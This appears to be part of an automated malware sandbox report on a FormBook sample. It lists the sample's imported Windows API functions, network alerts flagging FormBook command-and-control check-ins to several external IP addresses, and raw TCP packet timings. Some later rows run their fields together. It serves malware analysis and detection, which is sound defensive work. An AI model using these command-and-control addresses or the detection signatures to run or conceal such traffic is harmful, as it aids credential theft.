ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll | SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData
Language of compilation system | Country where language is spoken
English | Great Britain
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-30T18:44:31.185960+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49711 | 137.175.33.56 | 80 | TCP
2024-09-30T18:44:31.185960+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49711 | 137.175.33.56 | 80 | TCP
2024-09-30T18:44:46.814759+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49713 | 3.33.130.190 | 80 | TCP
2024-09-30T18:44:50.271880+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49714 | 3.33.130.190 | 80 | TCP
2024-09-30T18:44:51.911631+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49715 | 3.33.130.190 | 80 | TCP
2024-09-30T18:44:54.473989+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49716 | 3.33.130.190 | 80 | TCP
2024-09-30T18:44:54.473989+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49716 | 3.33.130.190 | 80 | TCP
2024-09-30T18:45:00.003802+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49717 | 3.33.130.190 | 80 | TCP
2024-09-30T18:45:02.521743+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49718 | 3.33.130.190 | 80 | TCP
2024-09-30T18:45:05.075570+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49719 | 3.33.130.190 | 80 | TCP
2024-09-30T18:45:08.252588+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49720 | 3.33.130.190 | 80 | TCP
2024-09-30T18:45:08.252588+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49720 | 3.33.130.190 | 80 | TCP
2024-09-30T18:45:15.518326+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49721 | 188.114.96.3 | 80 | TCP
2024-09-30T18:45:18.127639+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49722 | 188.114.96.3 | 80 | TCP
2024-09-30T18:45:20.674358+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49723 | 188.114.96.3 | 80 | TCP
2024-09-30T18:45:24.969888+0200 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.5 | 49724 | 188.114.96.3 | 80 | TCP
2024-09-30T18:45:24.969888+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.5 | 49724 | 188.114.96.3 | 80 | TCP
2024-09-30T18:45:30.783978+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49725 | 31.31.196.17 | 80 | TCP
2024-09-30T18:45:33.928191+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49726 | 31.31.196.17 | 80 | TCP
2024-09-30T18:45:36.499997+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.5 | 49727 | 31.31.196.17 | 80 | TCP
                                                                                          2024-09-30T18:45:39.051168+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54972831.31.196.1780TCP
                                                                                          2024-09-30T18:45:39.051168+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54972831.31.196.1780TCP
                                                                                          2024-09-30T18:45:44.803733+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497293.33.130.19080TCP
                                                                                          2024-09-30T18:45:47.605022+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497303.33.130.19080TCP
                                                                                          2024-09-30T18:45:49.890046+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497313.33.130.19080TCP
                                                                                          2024-09-30T18:45:52.448504+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5497323.33.130.19080TCP
                                                                                          2024-09-30T18:45:52.448504+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497323.33.130.19080TCP
                                                                                          2024-09-30T18:45:57.946440+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497333.33.130.19080TCP
                                                                                          2024-09-30T18:46:00.491065+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497343.33.130.19080TCP
                                                                                          2024-09-30T18:46:03.052545+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497353.33.130.19080TCP
                                                                                          2024-09-30T18:46:06.630905+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5497363.33.130.19080TCP
                                                                                          2024-09-30T18:46:06.630905+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497363.33.130.19080TCP
                                                                                          2024-09-30T18:46:12.840052+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549737199.192.21.16980TCP
                                                                                          2024-09-30T18:46:15.509966+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549738199.192.21.16980TCP
                                                                                          2024-09-30T18:46:18.150197+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549739199.192.21.16980TCP
                                                                                          2024-09-30T18:46:20.598814+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549740199.192.21.16980TCP
                                                                                          2024-09-30T18:46:20.598814+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549740199.192.21.16980TCP
                                                                                          2024-09-30T18:46:26.314021+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497413.33.130.19080TCP
                                                                                          2024-09-30T18:46:29.738124+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497423.33.130.19080TCP
                                                                                          2024-09-30T18:46:31.922116+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.5497433.33.130.19080TCP
                                                                                          2024-09-30T18:46:34.481837+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.5497443.33.130.19080TCP
                                                                                          2024-09-30T18:46:34.481837+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5497443.33.130.19080TCP
                                                                                          2024-09-30T18:46:40.040590+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549745188.114.96.380TCP
                                                                                          2024-09-30T18:46:42.546070+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549746188.114.96.380TCP
                                                                                          2024-09-30T18:46:45.069786+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.549747188.114.96.380TCP
                                                                                          2024-09-30T18:46:47.677651+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.549748188.114.96.380TCP
                                                                                          2024-09-30T18:46:47.677651+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.549748188.114.96.380TCP
                                                                                          2024-09-30T18:46:53.641925+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54974984.32.84.3280TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 30, 2024 18:44:30.576163054 CEST | 49711 | 80 | 192.168.2.5 | 137.175.33.56
Sep 30, 2024 18:44:30.581080914 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:30.581224918 CEST | 49711 | 80 | 192.168.2.5 | 137.175.33.56
Sep 30, 2024 18:44:30.590893984 CEST | 49711 | 80 | 192.168.2.5 | 137.175.33.56
Sep 30, 2024 18:44:30.595733881 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.185806990 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.185832024 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.185849905 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.185867071 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.185879946 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.185894012 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.185909033 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.185960054 CEST | 49711 | 80 | 192.168.2.5 | 137.175.33.56
Sep 30, 2024 18:44:31.185997963 CEST | 49711 | 80 | 192.168.2.5 | 137.175.33.56
Sep 30, 2024 18:44:31.186395884 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.186435938 CEST | 49711 | 80 | 192.168.2.5 | 137.175.33.56
Sep 30, 2024 18:44:31.186439037 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.186454058 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.186481953 CEST | 49711 | 80 | 192.168.2.5 | 137.175.33.56
Sep 30, 2024 18:44:31.190866947 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.190907955 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.190923929 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.190965891 CEST | 49711 | 80 | 192.168.2.5 | 137.175.33.56
Sep 30, 2024 18:44:31.191095114 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.191109896 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.191138029 CEST | 49711 | 80 | 192.168.2.5 | 137.175.33.56
Sep 30, 2024 18:44:31.236773014 CEST | 49711 | 80 | 192.168.2.5 | 137.175.33.56
Sep 30, 2024 18:44:31.278289080 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.278311968 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.278327942 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.278343916 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.278359890 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.278426886 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:31.278495073 CEST | 49711 | 80 | 192.168.2.5 | 137.175.33.56
Sep 30, 2024 18:44:31.278526068 CEST | 49711 | 80 | 192.168.2.5 | 137.175.33.56
Sep 30, 2024 18:44:31.284682989 CEST | 49711 | 80 | 192.168.2.5 | 137.175.33.56
Sep 30, 2024 18:44:31.289812088 CEST | 80 | 49711 | 137.175.33.56 | 192.168.2.5
Sep 30, 2024 18:44:46.350212097 CEST | 49713 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:46.355654001 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:46.355742931 CEST | 49713 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:46.365623951 CEST | 49713 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:46.370975018 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:46.814681053 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:46.814759016 CEST | 49713 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:47.888940096 CEST | 49713 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:47.893908024 CEST | 80 | 49713 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:48.896158934 CEST | 49714 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:48.901794910 CEST | 80 | 49714 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:48.901941061 CEST | 49714 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:48.912132978 CEST | 49714 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:48.917016029 CEST | 80 | 49714 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:50.271815062 CEST | 80 | 49714 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:50.271879911 CEST | 49714 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:50.424417019 CEST | 49714 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:50.429369926 CEST | 80 | 49714 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:51.442994118 CEST | 49715 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:51.448775053 CEST | 80 | 49715 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:51.448887110 CEST | 49715 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:51.458947897 CEST | 49715 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:51.464370012 CEST | 80 | 49715 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:51.464402914 CEST | 80 | 49715 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:51.911524057 CEST | 80 | 49715 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:51.911631107 CEST | 49715 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:52.971204042 CEST | 49715 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:52.976264000 CEST | 80 | 49715 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:53.997061014 CEST | 49716 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:54.002799988 CEST | 80 | 49716 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:54.002959967 CEST | 49716 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:54.016280890 CEST | 49716 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:54.021137953 CEST | 80 | 49716 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:54.473778963 CEST | 80 | 49716 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:54.473804951 CEST | 80 | 49716 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:54.473989010 CEST | 49716 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:54.476650953 CEST | 49716 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:54.481699944 CEST | 80 | 49716 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:59.507158041 CEST | 49717 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:59.512171030 CEST | 80 | 49717 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:44:59.512373924 CEST | 49717 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:59.522563934 CEST | 49717 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:44:59.527899027 CEST | 80 | 49717 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:00.003643036 CEST | 80 | 49717 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:00.003802061 CEST | 49717 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:01.035120010 CEST | 49717 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:01.040601015 CEST | 80 | 49717 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:02.052423000 CEST | 49718 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:02.057566881 CEST | 80 | 49718 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:02.057697058 CEST | 49718 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:02.067527056 CEST | 49718 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:02.073376894 CEST | 80 | 49718 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:02.521620989 CEST | 80 | 49718 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:02.521743059 CEST | 49718 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:03.580714941 CEST | 49718 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:03.585700035 CEST | 80 | 49718 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:04.599447966 CEST | 49719 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:04.604399920 CEST | 80 | 49719 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:04.604608059 CEST | 49719 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:04.614773035 CEST | 49719 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:04.619899035 CEST | 80 | 49719 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:04.620230913 CEST | 80 | 49719 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:05.075373888 CEST | 80 | 49719 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:05.075570107 CEST | 49719 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:06.127574921 CEST | 49719 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:06.440053940 CEST | 49719 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:06.521437883 CEST | 80 | 49719 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:06.521519899 CEST | 80 | 49719 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:06.521786928 CEST | 49719 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:07.146475077 CEST | 49720 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:07.151591063 CEST | 80 | 49720 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:07.151674986 CEST | 49720 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:07.160469055 CEST | 49720 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:07.165376902 CEST | 80 | 49720 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:08.252270937 CEST | 80 | 49720 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:08.252335072 CEST | 80 | 49720 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:08.252365112 CEST | 80 | 49720 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:08.252393961 CEST | 80 | 49720 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:08.252588034 CEST | 49720 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:08.252914906 CEST | 49720 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:08.255300045 CEST | 49720 | 80 | 192.168.2.5 | 3.33.130.190
Sep 30, 2024 18:45:08.261164904 CEST | 80 | 49720 | 3.33.130.190 | 192.168.2.5
Sep 30, 2024 18:45:13.996642113 CEST | 49721 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:14.001564980 CEST | 80 | 49721 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:14.001678944 CEST | 49721 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:14.011528969 CEST | 49721 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:14.016360998 CEST | 80 | 49721 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:15.518326044 CEST | 49721 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:15.830527067 CEST | 49721 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:16.318583965 CEST | 80 | 49721 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:16.318694115 CEST | 80 | 49721 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:16.318701982 CEST | 80 | 49721 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:16.318736076 CEST | 49721 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:16.318762064 CEST | 49721 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:16.318841934 CEST | 49721 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:16.320951939 CEST | 80 | 49721 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:16.321000099 CEST | 49721 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:16.321449995 CEST | 80 | 49721 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:16.321460009 CEST | 80 | 49721 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:16.321485043 CEST | 49721 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:16.321511984 CEST | 49721 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:16.536730051 CEST | 49722 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:16.611673117 CEST | 80 | 49722 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:16.611810923 CEST | 49722 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:16.621462107 CEST | 49722 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:16.628252983 CEST | 80 | 49722 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:18.127639055 CEST | 49722 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:18.133095026 CEST | 80 | 49722 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:18.133307934 CEST | 49722 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:19.146687031 CEST | 49723 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:19.151570082 CEST | 80 | 49723 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:19.151652098 CEST | 49723 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:19.166954994 CEST | 49723 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:19.171977043 CEST | 80 | 49723 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:19.172182083 CEST | 80 | 49723 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:20.674357891 CEST | 49723 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:20.682081938 CEST | 80 | 49723 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:20.682195902 CEST | 49723 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:21.693331003 CEST | 49724 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:22.705687046 CEST | 49724 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:22.802102089 CEST | 80 | 49724 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:22.802141905 CEST | 80 | 49724 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:22.802426100 CEST | 49724 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:22.802426100 CEST | 49724 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:22.809087038 CEST | 49724 | 80 | 192.168.2.5 | 188.114.96.3
Sep 30, 2024 18:45:22.815457106 CEST | 80 | 49724 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:24.969702959 CEST | 80 | 49724 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:24.969793081 CEST | 80 | 49724 | 188.114.96.3 | 192.168.2.5
Sep 30, 2024 18:45:24.969829082 CEST | 80 | 49724 | 188.114.96.3 | 192.168.2.5
                                                                                          Sep 30, 2024 18:45:24.969862938 CEST8049724188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:24.969887972 CEST4972480192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:24.969916105 CEST8049724188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:24.970022917 CEST4972480192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:24.972429991 CEST8049724188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:24.972793102 CEST4972480192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:24.972819090 CEST4972480192.168.2.5188.114.96.3
                                                                                          Sep 30, 2024 18:45:24.977955103 CEST8049724188.114.96.3192.168.2.5
                                                                                          Sep 30, 2024 18:45:30.092318058 CEST4972580192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:30.097259045 CEST804972531.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:30.097354889 CEST4972580192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:30.107839108 CEST4972580192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:30.113665104 CEST804972531.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:30.783900976 CEST804972531.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:30.783925056 CEST804972531.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:30.783977985 CEST4972580192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:31.613924980 CEST4972580192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:32.631947041 CEST4972680192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:33.239751101 CEST804972631.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:33.239862919 CEST4972680192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:33.269056082 CEST4972680192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:33.273912907 CEST804972631.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:33.928003073 CEST804972631.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:33.928025007 CEST804972631.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:33.928190947 CEST4972680192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:34.789660931 CEST4972680192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:35.802697897 CEST4972780192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:35.807728052 CEST804972731.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:35.809099913 CEST4972780192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:35.819681883 CEST4972780192.168.2.531.31.196.17
                                                                                          Sep 30, 2024 18:45:35.824665070 CEST804972731.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:35.824795008 CEST804972731.31.196.17192.168.2.5
                                                                                          Sep 30, 2024 18:45:36.499644041 CEST804972731.31.196.17192.168.2.5
